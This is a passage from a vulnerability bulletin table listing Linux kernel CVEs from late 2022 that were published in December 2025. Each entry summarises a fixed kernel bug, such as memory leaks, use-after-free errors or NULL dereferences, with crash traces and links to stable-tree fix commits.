https://git.kernel.org/stable/c/b12e924a2f5b960373459c8f8a514f887adf5cac |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: virtio-crypto: fix memory leak in virtio_crypto_alg_skcipher_close_session() 'vc_ctrl_req' is allocated in virtio_crypto_alg_skcipher_close_session(), and should be freed in the invalid ctrl_status->status error handling case. Otherwise there is a memory leak. | 2025-12-24 | not yet calculated | CVE-2022-50707 | https://git.kernel.org/stable/c/79026a2d0a1b080257773d22a493f9bcab8c65be https://git.kernel.org/stable/c/67fb59ff1384e338679c0eb7a43c83ce8868c9fa https://git.kernel.org/stable/c/0871df190fe6723464efe0f493d476411616f553 https://git.kernel.org/stable/c/b1d65f717cd6305a396a8738e022c6f7c65cfbe8 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: HSI: ssi_protocol: fix potential resource leak in ssip_pn_open() ssip_pn_open() claims the HSI client's port with hsi_claim_port(). When hsi_register_port_event() gets some error and returns a negative value, the HSI client's port should be released with hsi_release_port(). Fix it by calling hsi_release_port() when hsi_register_port_event() fails. | 2025-12-24 | not yet calculated | CVE-2022-50708 | https://git.kernel.org/stable/c/78b0ef14896f843c45372f9bbdb6f6070f977eaf https://git.kernel.org/stable/c/e78b45b3eeee1cec77c794fcbf0512537c20b1dc https://git.kernel.org/stable/c/b28dbcb379e6a7f80262c2732a57681b1ee548ca |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: ath9k: avoid uninit memory read in ath9k_htc_rx_msg() syzbot is reporting an uninit value at ath9k_htc_rx_msg() [1], for ioctl(USB_RAW_IOCTL_EP_WRITE) can call ath9k_hif_usb_rx_stream() with pkt_len = 0 but ath9k_hif_usb_rx_stream() uses __dev_alloc_skb(pkt_len + 32, GFP_ATOMIC) based on an assumption that pkt_len is valid. As a result, ath9k_hif_usb_rx_stream() allocates an skb with uninitialized memory and ath9k_htc_rx_msg() is reading from uninitialized memory. Since the bytes accessed by ath9k_htc_rx_msg() are not known until ath9k_htc_rx_msg() is called, it would be difficult to check the minimal valid pkt_len at the "if (pkt_len > 2 * MAX_RX_BUF_SIZE) {" line in ath9k_hif_usb_rx_stream(). We have two choices. One is to work around by adding __GFP_ZERO so that ath9k_htc_rx_msg() sees 0 if pkt_len is invalid. The other is to let ath9k_htc_rx_msg() validate pkt_len before accessing. This patch chose the latter. Note that I'm not sure the threshold condition is correct, for I can't find details on possible packet length used by this protocol. | 2025-12-24 | not yet calculated | CVE-2022-50709 | https://git.kernel.org/stable/c/f3d2a3b7e290d0bdbddfcee5a6c3d922e2b7e02a https://git.kernel.org/stable/c/84242f15f911f34aec9b22f99d1e9bff19723dbe https://git.kernel.org/stable/c/2c485f4f2a64258acc5228e78ffb828c68d9e770 https://git.kernel.org/stable/c/9661724f6206bd606ecf13acada676a9975d230b https://git.kernel.org/stable/c/b1b4144508adfc585e43856b31baaf9008a3beb4 https://git.kernel.org/stable/c/0d2649b288b7b9484e3d4380c0d6c4720a17e473 https://git.kernel.org/stable/c/4891a50f5ed8bfcb8f2a4b816b0676f398687783 https://git.kernel.org/stable/c/b383e8abed41cc6ff1a3b34de75df9397fa4878c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ice: set tx_tstamps when creating new Tx rings via ethtool When the user changes the number of queues via ethtool, the driver allocates new rings. This allocation did not initialize tx_tstamps. This results in the tx_tstamps field being zero (due to kcalloc allocation), and would result in a NULL pointer dereference when attempting a transmit timestamp on the new ring. | 2025-12-24 | not yet calculated | CVE-2022-50710 | https://git.kernel.org/stable/c/624f03a027f2b18647cc4f1a7a81920a1e4e0201 https://git.kernel.org/stable/c/13180cb88a7be5ee389f65f6ab9f78e46f7722b2 https://git.kernel.org/stable/c/9eb5fff6b0e78819c758892282da5faa915724d0 https://git.kernel.org/stable/c/b3b173745c8cab1e24d6821488b60abed3acb24d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: ethernet: mtk_eth_soc: fix possible memory leak in mtk_probe() If mtk_wed_add_hw() has been called, mtk_wed_exit() needs to be called in the error path or when removing the module to free the memory allocated in mtk_wed_add_hw(). | 2025-12-24 | not yet calculated | CVE-2022-50711 | https://git.kernel.org/stable/c/96bde7c4f5683d8c1c809ddb781ef3fdec9b7215 https://git.kernel.org/stable/c/b3d0d98179d62f9d55635a600679c4fa362baf8d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: devlink: hold region lock when flushing snapshots Netdevsim triggers a splat on reload, when it destroys regions with snapshots pending: WARNING: CPU: 1 PID: 787 at net/core/devlink.c:6291 devlink_region_snapshot_del+0x12e/0x140 CPU: 1 PID: 787 Comm: devlink Not tainted 6.1.0-07460-g7ae9888d6e1c #580 RIP: 0010:devlink_region_snapshot_del+0x12e/0x140 Call Trace: <TASK> devl_region_destroy+0x70/0x140 nsim_dev_reload_down+0x2f/0x60 [netdevsim] devlink_reload+0x1f7/0x360 devlink_nl_cmd_reload+0x6ce/0x860 genl_family_rcv_msg_doit.isra.0+0x145/0x1c0 This is the locking assert in devlink_region_snapshot_del(); we're supposed to be holding the region->snapshot_lock here. | 2025-12-24 | not yet calculated | CVE-2022-50712 | https://git.kernel.org/stable/c/49383d4e59bb704341aaa1d51440ccce58270e61 https://git.kernel.org/stable/c/6298cab4d80bfdb6fe01fe31fd9f0ba26317fdae https://git.kernel.org/stable/c/b4cafb3d2c740f8d1b1234b43ac4a60e5291c960 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: clk: visconti: Fix memory leak in visconti_register_pll() @pll->rate_table has memory allocated by kmemdup(); if clk_hw_register() fails, it should be freed, otherwise it will cause a memory leak issue. This patch fixes it. | 2025-12-24 | not yet calculated | CVE-2022-50713 | https://git.kernel.org/stable/c/70af9bf13be1716eac452c8a29ce6fe6b957a5db https://git.kernel.org/stable/c/f0f1982ddfb418bf7bf05dadebae5c6869a41d41 https://git.kernel.org/stable/c/b55226f8553d255f5002c751c7c6ba9291f34bf2 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: mt76: mt7921e: fix rmmod crash in driver reload test In the insmod/rmmod stress test, the following crash dump shows up immediately. The problem is caused by a missing mt76_dev in mt7921_pci_remove(). We should make sure the drvdata is ready before probe() finishes. [168.862789] ================================================================== [168.862797] BUG: KASAN: user-memory-access in try_to_grab_pending+0x59/0x480 [168.862805] Write of size 8 at addr 0000000000006df0 by task rmmod/5361 [168.862812] CPU: 7 PID: 5361 Comm: rmmod Tainted: G OE 5.19.0-rc6 #1 [168.862816] Hardware name: Intel(R) Client Systems NUC8i7BEH/NUC8BEB, 05/04/2020 [168.862820] Call Trace: [168.862822] <TASK> [168.862825] dump_stack_lvl+0x49/0x63 [168.862832] print_report.cold+0x493/0x6b7 [168.862845] kasan_report+0xa7/0x120 [168.862857] kasan_check_range+0x163/0x200 [168.862861] __kasan_check_write+0x14/0x20 [168.862866] try_to_grab_pending+0x59/0x480 [168.862870] __cancel_work_timer+0xbb/0x340 [168.862898] cancel_work_sync+0x10/0x20 [168.862902] mt7921_pci_remove+0x61/0x1c0 [mt7921e] [168.862909] pci_device_remove+0xa3/0x1d0 [168.862914] device_remove+0xc4/0x170 [168.862920] device_release_driver_internal+0x163/0x300 [168.862925] driver_detach+0xc7/0x1a0 [168.862930] bus_remove_driver+0xeb/0x2d0 [168.862935] driver_unregister+0x71/0xb0 [168.862939] pci_unregister_driver+0x30/0x230 [168.862944] mt7921_pci_driver_exit+0x10/0x1b [mt7921e] [168.862949] __x64_sys_delete_module+0x2f9/0x4b0 [168.862968] do_syscall_64+0x38/0x90 [168.862973] entry_SYSCALL_64_after_hwframe+0x63/0xcd Test steps: 1. insmod 2. do not ifup 3. rmmod quickly (within 1 second) | 2025-12-24 | not yet calculated | CVE-2022-50714 | https://git.kernel.org/stable/c/1034d8e08508830161377f136a060e78fc24f2a5 https://git.kernel.org/stable/c/ccda3ebdae719d348f90563b6719fba4929ae283 https://git.kernel.org/stable/c/b5a62d612b7baf6e09884e4de94decb6391d6a9d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: md/raid1: stop mdx_raid1 thread when raid1 array run failed Running the raid1 array fails when we assemble the array with the inactive disk only, but the mdx_raid1 thread was not stopped, even though the associated resources have been released. This causes a NULL dereference when we do poweroff. This causes the following Oops: [ 287.587787] BUG: kernel NULL pointer dereference, address: 0000000000000070 [ 287.594762] #PF: supervisor read access in kernel mode [ 287.599912] #PF: error_code(0x0000) - not-present page [ 287.605061] PGD 0 P4D 0 [ 287.607612] Oops: 0000 [#1] SMP NOPTI [ 287.611287] CPU: 3 PID: 5265 Comm: md0_raid1 Tainted: G U 5.10.146 #0 [ 287.619029] Hardware name: xxxxxxx/To be filled by O.E.M, BIOS 5.19 06/16/2022 [ 287.626775] RIP: 0010:md_check_recovery+0x57/0x500 [md_mod] [ 287.632357] Code: fe 01 00 00 48 83 bb 10 03 00 00 00 74 08 48 89 ...... [ 287.651118] RSP: 0018:ffffc90000433d78 EFLAGS: 00010202 [ 287.656347] RAX: 0000000000000000 RBX: ffff888105986800 RCX: 0000000000000000 [ 287.663491] RDX: ffffc90000433bb0 RSI: 00000000ffffefff RDI: ffff888105986800 [ 287.670634] RBP: ffffc90000433da0 R08: 0000000000000000 R09: c0000000ffffefff [ 287.677771] R10: 0000000000000001 R11: ffffc90000433ba8 R12: ffff888105986800 [ 287.684907] R13: 0000000000000000 R14: fffffffffffffe00 R15: ffff888100b6b500 [ 287.692052] FS: 0000000000000000(0000) GS:ffff888277f80000(0000) knlGS:0000000000000000 [ 287.700149] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 287.705897] CR2: 0000000000000070 CR3: 000000000320a000 CR4: 0000000000350ee0 [ 287.713033] Call Trace: [ 287.715498] raid1d+0x6c/0xbbb [raid1] [ 287.719256] ? __schedule+0x1ff/0x760 [ 287.722930] ? schedule+0x3b/0xb0 [ 287.726260] ? schedule_timeout+0x1ed/0x290 [ 287.730456] ? __switch_to+0x11f/0x400 [ 287.734219] md_thread+0xe9/0x140 [md_mod] [ 287.738328] ? md_thread+0xe9/0x140 [md_mod] [ 287.742601] ? wait_woken+0x80/0x80 [ 287.746097] ? md_register_thread+0xe0/0xe0 [md_mod] [ 287.751064] kthread+0x11a/0x140 [ 287.754300] ? kthread_park+0x90/0x90 [ 287.757974] ret_from_fork+0x1f/0x30 In fact, when the raid1 array run fails, we need to do md_unregister_thread() before raid1_free(). | 2025-12-24 | not yet calculated | CVE-2022-50715 | https://git.kernel.org/stable/c/d684ceb77311410aeaf5189d321f9f564838c49a https://git.kernel.org/stable/c/110f14a7b2eb5b8aa9df5af2d629524f2a07d543 https://git.kernel.org/stable/c/0c7c7468c3ae222e297b7dc74d6ccb69c4d0183c https://git.kernel.org/stable/c/19d5a0e17aba92b10d895e40ec782768cf00da23 https://git.kernel.org/stable/c/10d713532ffc67b13df61ed9c138a8ce0a186236 https://git.kernel.org/stable/c/a3cc41e05e8af340a2a759b168c29fffdb9194eb https://git.kernel.org/stable/c/22be44212cad8be96860346882d8e694b0b437b6 https://git.kernel.org/stable/c/d26364596db8f8b55277b2afb3952e05a4057a21 https://git.kernel.org/stable/c/b611ad14006e5be2170d9e8e611bf49dff288911 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: ar5523: Fix use-after-free on ar5523_cmd() timed out syzkaller reported a use-after-free with a stack trace like the one below [1]: [ 38.960489][ C3] ================================================================== [ 38.963216][ C3] BUG: KASAN: use-after-free in ar5523_cmd_tx_cb+0x220/0x240 [ 38.964950][ C3] Read of size 8 at addr ffff888048e03450 by task swapper/3/0 [ 38.966363][ C3] [ 38.967053][ C3] CPU: 3 PID: 0 Comm: swapper/3 Not tainted 6.0.0-09039-ga6afa4199d3d-dirty #18 [ 38.968464][ C3] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.0-1.fc36 04/01/2014 [ 38.969959][ C3] Call Trace: [ 38.970841][ C3] <IRQ> [ 38.971663][ C3] dump_stack_lvl+0xfc/0x174 [ 38.972620][ C3] print_report.cold+0x2c3/0x752 [ 38.973626][ C3] ? ar5523_cmd_tx_cb+0x220/0x240 [ 38.974644][ C3] kasan_report+0xb1/0x1d0 [ 38.975720][ C3] ? ar5523_cmd_tx_cb+0x220/0x240 [ 38.976831][ C3] ar5523_cmd_tx_cb+0x220/0x240 [ 38.978412][ C3] __usb_hcd_giveback_urb+0x353/0x5b0 [ 38.979755][ C3] usb_hcd_giveback_urb+0x385/0x430 [ 38.981266][ C3] dummy_timer+0x140c/0x34e0 [ 38.982925][ C3] ? notifier_call_chain+0xb5/0x1e0 [ 38.984761][ C3] ? rcu_read_lock_sched_held+0xb/0x60 [ 38.986242][ C3] ? lock_release+0x51c/0x790 [ 38.987323][ C3] ? _raw_read_unlock_irqrestore+0x37/0x70 [ 38.988483][ C3] ? __wake_up_common_lock+0xde/0x130 [ 38.989621][ C3] ? reacquire_held_locks+0x4a0/0x4a0 [ 38.990777][ C3] ? lock_acquire+0x472/0x550 [ 38.991919][ C3] ? rcu_read_lock_sched_held+0xb/0x60 [ 38.993138][ C3] ? lock_acquire+0x472/0x550 [ 38.994890][ C3] ? dummy_urb_enqueue+0x860/0x860 [ 38.996266][ C3] ? do_raw_spin_unlock+0x16f/0x230 [ 38.997670][ C3] ? dummy_urb_enqueue+0x860/0x860 [ 38.999116][ C3] call_timer_fn+0x1a0/0x6a0 [ 39.000668][ C3] ? add_timer_on+0x4a0/0x4a0 [ 39.002137][ C3] ? reacquire_held_locks+0x4a0/0x4a0 [ 39.003809][ C3] ? __next_timer_interrupt+0x226/0x2a0 [ 39.005509][ C3] __run_timers.part.0+0x69a/0xac0 [ 39.007025][ C3] ? dummy_urb_enqueue+0x860/0x860 [ 39.008716][ C3] ? call_timer_fn+0x6a0/0x6a0 [ 39.010254][ C3] ? cpuacct_percpu_seq_show+0x10/0x10 [ 39.011795][ C3] ? kvm_sched_clock_read+0x14/0x40 [ 39.013277][ C3] ? sched_clock_cpu+0x69/0x2b0 [ 39.014724][ C3] run_timer_softirq+0xb6/0x1d0 [ 39.016196][ C3] __do_softirq+0x1d2/0x9be [ 39.017616][ C3] __irq_exit_rcu+0xeb/0x190 [ 39.019004][ C3] irq_exit_rcu+0x5/0x20 [ 39.020361][ C3] sysvec_apic_timer_interrupt+0x8f/0xb0 [ 39.021965][ C3] </IRQ> [ 39.023237][ C3] <TASK> In ar5523_probe(), ar5523_host_available() calls ar5523_cmd() as below (there are other functions which finally call ar5523_cmd()): ar5523_probe() -> ar5523_host_available() -> ar5523_cmd_read() -> ar5523_cmd() If ar5523_cmd() timed out, then ar5523_host_available() failed and ar5523_probe() freed the device structure. So, ar5523_cmd_tx_cb() might touch the freed structure. This patch fixes this issue by canceling the in-flight tx cmd if the submitted urb timed out. | 2025-12-24 | not yet calculated | CVE-2022-50716 | https://git.kernel.org/stable/c/c9ba3fbf6a488da6cad1d304c5234bd8d729eba3 https://git.kernel.org/stable/c/340524ae7b53a72cf5d9e7bd7790433422b3b12f https://git.kernel.org/stable/c/6447beefd21326a3f4719ec2ea511df797f6c820 https://git.kernel.org/stable/c/7360b323e0343ea099091d4ae09576dbe1f09516 https://git.kernel.org/stable/c/8af52492717e3538eba3f81d012b1476af8a89a6 https://git.kernel.org/stable/c/3eca9697c2f3905dea3ad2fc536ebaa1fbd735bd https://git.kernel.org/stable/c/601ae89375033ac4870c086e24ba03f235d38e55 https://git.kernel.org/stable/c/9aef34e1ae35a87e5f6a22278c17823b7ce64c88 https://git.kernel.org/stable/c/b6702a942a069c2a975478d719e98d83cdae1797 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: nvmet-tcp: add bounds check on Transfer Tag ttag is used as an index to get cmd in nvmet_tcp_handle_h2c_data_pdu(); add a bounds check to avoid out-of-bounds access. | 2025-12-24 | not yet calculated | CVE-2022-50717 | https://git.kernel.org/stable/c/0d150ccd55dbfad36f55855b40b381884c98456e https://git.kernel.org/stable/c/d5bb45f47b37d10f010355686b28c9ebacb361d4 https://git.kernel.org/stable/c/ec8adf767e1cfa7031f853b8c71ba1963f07df15 https://git.kernel.org/stable/c/fcf82e4553db911d10234ff2390cfd0e2aa854e4 https://git.kernel.org/stable/c/752593d04637ebdc87fd29cba81897f21ae053f0 https://git.kernel.org/stable/c/b6a545ffa2c192b1e6da4a7924edac5ba9f4ea2b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amdgpu: fix pci device refcount leak As the comment on pci_get_domain_bus_and_slot() says, it returns a pci device with its refcount incremented; when finished using it, the caller must decrement the reference count by calling pci_dev_put(). So before returning from amdgpu_device_resume|suspend_display_audio(), pci_dev_put() is called to avoid a refcount leak. | 2025-12-24 | not yet calculated | CVE-2022-50718 | https://git.kernel.org/stable/c/3725a8f26bdbc38dfdf545836117f1e069277c91 https://git.kernel.org/stable/c/02105f0b3021ee5853b2fa50853c42f35fc01cfd https://git.kernel.org/stable/c/f13661b72a61708cecb06562f8acff068a4f31f7 https://git.kernel.org/stable/c/d7352b410471cbebf6350b2990bae82bb0d59a76 https://git.kernel.org/stable/c/b85e285e3d6352b02947fc1b72303673dfacb0aa |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ALSA: line6: fix stack overflow in line6_midi_transmit Correctly calculate available space including the size of the chunk buffer. This fixes a buffer overflow when multiple MIDI sysex messages are sent to a PODxt device. | 2025-12-24 | not yet calculated | CVE-2022-50719 | https://git.kernel.org/stable/c/b026af92b2cea907c780f7168c730c816cd33311 https://git.kernel.org/stable/c/49cb7737e733013ec86aa77ed2e19b94a68eaa05 https://git.kernel.org/stable/c/0c76087449ee4ed45a88b10017d02c6694caedb1 https://git.kernel.org/stable/c/25e8c6ecb46843a955f254b8f0d77894e4a53dc4 https://git.kernel.org/stable/c/66f359ad66d49f75d39ac729f9114dabf90b81bb https://git.kernel.org/stable/c/0c9118e381ff538874e00fd4e66a768273c150fb https://git.kernel.org/stable/c/61e4be4a60cc6de723f8c574ddbcb3025eb44cac https://git.kernel.org/stable/c/389d34c2a8b52acc351fd932ed4bea41fee5a39b https://git.kernel.org/stable/c/b8800d324abb50160560c636bfafe2c81001b66c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: x86/apic: Don't disable x2APIC if locked The APIC supports two modes, legacy APIC (or xAPIC), and Extended APIC (or x2APIC). X2APIC mode is mostly compatible with legacy APIC, but it disables the memory-mapped APIC interface in favor of one that uses MSRs. The APIC mode is controlled by the EXT bit in the APIC MSR. The MMIO/xAPIC interface has some problems, most notably the APIC LEAK [1]. This bug allows an attacker to use the APIC MMIO interface to extract data from the SGX enclave. Introduce support for a new feature that will allow the BIOS to lock the APIC in x2APIC mode. If the APIC is locked in x2APIC mode and the kernel tries to disable the APIC or revert to legacy APIC mode, a GP fault will occur. Introduce support for a new MSR (IA32_XAPIC_DISABLE_STATUS) and handle the new locked mode when the LEGACY_XAPIC_DISABLED bit is set by preventing the kernel from trying to disable the x2APIC. On platforms with the IA32_XAPIC_DISABLE_STATUS MSR, if SGX or TDX are enabled, the LEGACY_XAPIC_DISABLED bit will be set by the BIOS. If legacy APIC is required, then SGX and TDX need to be disabled in the BIOS. [1]: https://aepicleak.com/aepicleak.pdf | 2025-12-24 | not yet calculated | CVE-2022-50720 | https://git.kernel.org/stable/c/05785ba834f23272f9d23427ae4a80ac505a5296 https://git.kernel.org/stable/c/dd1241e00addbf0b95f6cd6ce32152692820657e https://git.kernel.org/stable/c/b8d1d163604bd1e600b062fb00de5dc42baa355f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: dmaengine: qcom-adm: fix wrong calling convention for prep_slave_sg The calling convention for prep_slave_sg is to return NULL on error and provide an error log to the system. Qcom-adm instead provides an error pointer when an error occurs. This indirectly causes a kernel panic, for example for the nandc driver, which checks only whether the pointer returned by device_prep_slave_sg is not NULL. Returning an error pointer makes nandc think the device_prep_slave_sg function completed correctly and makes the kernel panic later in the code. While nandc is the one that makes the kernel crash, it was pointed out that the real problem is qcom-adm not following the calling convention for that function. To fix this, drop returning an error pointer and return NULL with an error log. | 2025-12-24 | not yet calculated | CVE-2022-50721 | https://git.kernel.org/stable/c/5653bd0200944e5803fa8e32dc36aa49931312f9 https://git.kernel.org/stable/c/9a041174c58a226e713f6cebd41eccec7a5cfa72 https://git.kernel.org/stable/c/b9d2140c3badf4107973ad77c5a0ec3075705c85 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: ipu3-imgu: Fix NULL pointer dereference in active selection access What the IMGU driver did was that it first acquired the pointers to active and try V4L2 subdev state, and only then figured out which one to use. The problem with that approach and a later patch (see Fixes: tag) is that as sd_state argument to v4l2_subdev_get_try_crop() et al is NULL, there is now an attempt to dereference that. Fix this. Also rewrap lines a little. | 2025-12-24 | not yet calculated | CVE-2022-50722 | https://git.kernel.org/stable/c/5265cc1202a31f7097691c3483a0d60d624424a5 https://git.kernel.org/stable/c/740717b756c17190dc2d2ad4c6de1e63f214e0c9 https://git.kernel.org/stable/c/b9eb3ab6f30bf32f7326909f17949ccb11bab514 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: bnxt_en: fix memory leak in bnxt_nvm_test() Free the kzalloc'ed buffer before returning in the success path. | 2025-12-24 | not yet calculated | CVE-2022-50723 | https://git.kernel.org/stable/c/be083d97031712a2e16fd915ddb8fe1a6cb1fbc5 https://git.kernel.org/stable/c/ba077d683d45190afc993c1ce45bcdbfda741a40 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: regulator: core: fix resource leak in regulator_register() I got some resource leak reports while doing fault injection test: OF: ERROR: memory leak, expected refcount 1 instead of 100, of_node_get()/of_node_put() unbalanced - destroy cset entry: attach overlay node /i2c/pmic@64/regulators/buck1 unreferenced object 0xffff88810deea000 (size 512): comm "490-i2c-rt5190a", pid 253, jiffies 4294859840 (age 5061.046s) hex dump (first 32 bytes): 00 00 00 00 ad 4e ad de ff ff ff ff 00 00 00 00 .....N.......... ff ff ff ff ff ff ff ff a0 1e 00 a1 ff ff ff ff ................ backtrace: [<00000000d78541e2>] kmalloc_trace+0x21/0x110 [<00000000b343d153>] device_private_init+0x32/0xd0 [<00000000be1f0c70>] device_add+0xb2d/0x1030 [<00000000e3e6344d>] regulator_register+0xaf2/0x12a0 [<00000000e2f5e754>] devm_regulator_register+0x57/0xb0 [<000000008b898197>] rt5190a_probe+0x52a/0x861 [rt5190a_regulator] unreferenced object 0xffff88810b617b80 (size 32): comm "490-i2c-rt5190a", pid 253, jiffies 4294859904 (age 5060.983s) hex dump (first 32 bytes): 72 65 67 75 6c 61 74 6f 72 2e 32 38 36 38 2d 53 regulator.2868-S 55 50 50 4c 59 00 ff ff 29 00 00 00 2b 00 00 00 UPPLY...)...+... backtrace: [<000000009da9280d>] __kmalloc_node_track_caller+0x44/0x1b0 [<0000000025c6a4e5>] kstrdup+0x3a/0x70 [<00000000790efb69>] create_regulator+0xc0/0x4e0 [<0000000005ed203a>] regulator_resolve_supply+0x2d4/0x440 [<0000000045796214>] regulator_register+0x10b3/0x12a0 [<00000000e2f5e754>] devm_regulator_register+0x57/0xb0 [<000000008b898197>] rt5190a_probe+0x52a/0x861 [rt5190a_regulator] After calling regulator_resolve_supply(), 'rdev->supply' is set by set_supply(); after this, in the error path, the resources need to be released, so call regulator_put() to avoid the leaks. | 2025-12-24 | not yet calculated | CVE-2022-50724 | https://git.kernel.org/stable/c/35593d60b1622834984c43add7646d4069671aa9 https://git.kernel.org/stable/c/6a03c31d08f95dca9633a552de167b9e625833a8 https://git.kernel.org/stable/c/c4c64d8abd656b9807b63178750fa91454602b86 https://git.kernel.org/stable/c/90b713aadc1240bf2dd03d610d6c1d016a9123a2 https://git.kernel.org/stable/c/f86b2f216636790d5922458578825e4628fb570f https://git.kernel.org/stable/c/ba62319a42c50e6254e98b3f316464fac8e77968 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: vidtv: Fix use-after-free in vidtv_bridge_dvb_init() KASAN reports a use-after-free: BUG: KASAN: use-after-free in dvb_dmxdev_release+0x4d5/0x5d0 [dvb_core] Call Trace: ... dvb_dmxdev_release+0x4d5/0x5d0 [dvb_core] vidtv_bridge_probe+0x7bf/0xa40 [dvb_vidtv_bridge] platform_probe+0xb6/0x170 ... Allocated by task 1238: ... dvb_register_device+0x1a7/0xa70 [dvb_core] dvb_dmxdev_init+0x2af/0x4a0 [dvb_core] vidtv_bridge_probe+0x766/0xa40 [dvb_vidtv_bridge] ... Freed by task 1238: dvb_register_device+0x6d2/0xa70 [dvb_core] dvb_dmxdev_init+0x2af/0x4a0 [dvb_core] vidtv_bridge_probe+0x766/0xa40 [dvb_vidtv_bridge] ... It is because the error handling in vidtv_bridge_dvb_init() is wrong. First, vidtv_bridge_dmx(dev)_init() will clean up after themselves when they fail, but the goto fail_dmx(_dev): path calls the release functions again, which causes a use-after-free. Also, in fail_fe, fail_tuner_probe and fail_demod_probe, j = i will cause an out-of-bounds access when i has finished its loop (i == NUM_FE). And the loop releasing is wrong, although now NUM_FE is 1 so it won't cause a problem. Fix this by correctly releasing everything. | 2025-12-24 | not yet calculated | CVE-2022-50725 | https://git.kernel.org/stable/c/0369af6fe33d4053899b121b32e91f870b2cf0ae https://git.kernel.org/stable/c/c290aa527fd832d278c6388a3ba53a9890fbd74a https://git.kernel.org/stable/c/06398ce69571a43a8a0dd0f1bfe35d221f726a6a https://git.kernel.org/stable/c/8a204a0b4a0d105229735222c515759ea2b126c1 https://git.kernel.org/stable/c/ba8d9405935097e296bcf7a942c3a01df0edb865 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/mlx5: Fix possible use-after-free in async command interface mlx5_cmd_cleanup_async_ctx should return only after all its callback handlers were completed. Before this patch, the below race between mlx5_cmd_cleanup_async_ctx and mlx5_cmd_exec_cb_handler was possible and led to a use-after-free: 1. mlx5_cmd_cleanup_async_ctx is called while num_inflight is 2 (i.e. elevated by 1, a single inflight callback). 2. mlx5_cmd_cleanup_async_ctx decreases num_inflight to 1. 3. mlx5_cmd_exec_cb_handler is called, decreases num_inflight to 0 and is about to call wake_up(). 4. mlx5_cmd_cleanup_async_ctx calls wait_event, which returns immediately as the condition (num_inflight == 0) holds. 5. mlx5_cmd_cleanup_async_ctx returns. 6. The caller of mlx5_cmd_cleanup_async_ctx frees the mlx5_async_ctx object. 7. mlx5_cmd_exec_cb_handler goes on and calls wake_up() on the freed object. Fix it by syncing using a completion object. Mark it completed when num_inflight reaches 0. Trace: BUG: KASAN: use-after-free in do_raw_spin_lock+0x23d/0x270 Read of size 4 at addr ffff888139cd12f4 by task swapper/5/0 CPU: 5 PID: 0 Comm: swapper/5 Not tainted 6.0.0-rc3_for_upstream_debug_2022_08_30_13_10 #1 Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1.13.0-0-gf21b5a4aeb02-prebuilt.qemu.org 04/01/2014 Call Trace: <IRQ> dump_stack_lvl+0x57/0x7d print_report.cold+0x2d5/0x684 ? do_raw_spin_lock+0x23d/0x270 kasan_report+0xb1/0x1a0 ? do_raw_spin_lock+0x23d/0x270 do_raw_spin_lock+0x23d/0x270 ? rwlock_bug.part.0+0x90/0x90 ? __delete_object+0xb8/0x100 ? lock_downgrade+0x6e0/0x6e0 _raw_spin_lock_irqsave+0x43/0x60 ? __wake_up_common_lock+0xb9/0x140 __wake_up_common_lock+0xb9/0x140 ? __wake_up_common+0x650/0x650 ? destroy_tis_callback+0x53/0x70 [mlx5_core] ? kasan_set_track+0x21/0x30 ? destroy_tis_callback+0x53/0x70 [mlx5_core] ? kfree+0x1ba/0x520 ? do_raw_spin_unlock+0x54/0x220 mlx5_cmd_exec_cb_handler+0x136/0x1a0 [mlx5_core] ? mlx5_cmd_cleanup_async_ctx+0x220/0x220 [mlx5_core] ? mlx5_cmd_cleanup_async_ctx+0x220/0x220 [mlx5_core] mlx5_cmd_comp_handler+0x65a/0x12b0 [mlx5_core] ? dump_command+0xcc0/0xcc0 [mlx5_core] ? lockdep_hardirqs_on_prepare+0x400/0x400 ? cmd_comp_notifier+0x7e/0xb0 [mlx5_core] cmd_comp_notifier+0x7e/0xb0 [mlx5_core] atomic_notifier_call_chain+0xd7/0x1d0 mlx5_eq_async_int+0x3ce/0xa20 [mlx5_core] atomic_notifier_call_chain+0xd7/0x1d0 ? irq_release+0x140/0x140 [mlx5_core] irq_int_handler+0x19/0x30 [mlx5_core] __handle_irq_event_percpu+0x1f2/0x620 handle_irq_event+0xb2/0x1d0 handle_edge_irq+0x21e/0xb00 __common_interrupt+0x79/0x1a0 common_interrupt+0x78/0xa0 </IRQ> <TASK> asm_common_interrupt+0x22/0x40 RIP: 0010:default_idle+0x42/0x60 Code: c1 83 e0 07 48 c1 e9 03 83 c0 03 0f b6 14 11 38 d0 7c 04 84 d2 75 14 8b 05 eb 47 22 02 85 c0 7e 07 0f 00 2d e0 9f 48 00 fb f4 <c3> 48 c7 c7 80 08 7f 85 e8 d1 d3 3e fe eb de 66 66 2e 0f 1f 84 00 RSP: 0018:ffff888100dbfdf0 EFLAGS: 00000242 RAX: 0000000000000001 RBX: ffffffff84ecbd48 RCX: 1ffffffff0afe110 RDX: 0000000000000004 RSI: 0000000000000000 RDI: ffffffff835cc9bc RBP: 0000000000000005 R08: 0000000000000001 R09: ffff88881dec4ac3 R10: ffffed1103bd8958 R11: 0000017d0ca571c9 R12: 0000000000000005 R13: ffffffff84f024e0 R14: 0000000000000000 R15: dffffc0000000000 ? default_idle_call+0xcc/0x450 default_idle_call+0xec/0x450 do_idle+0x394/0x450 ? arch_cpu_idle_exit+0x40/0x40 ? do_idle+0x17/0x450 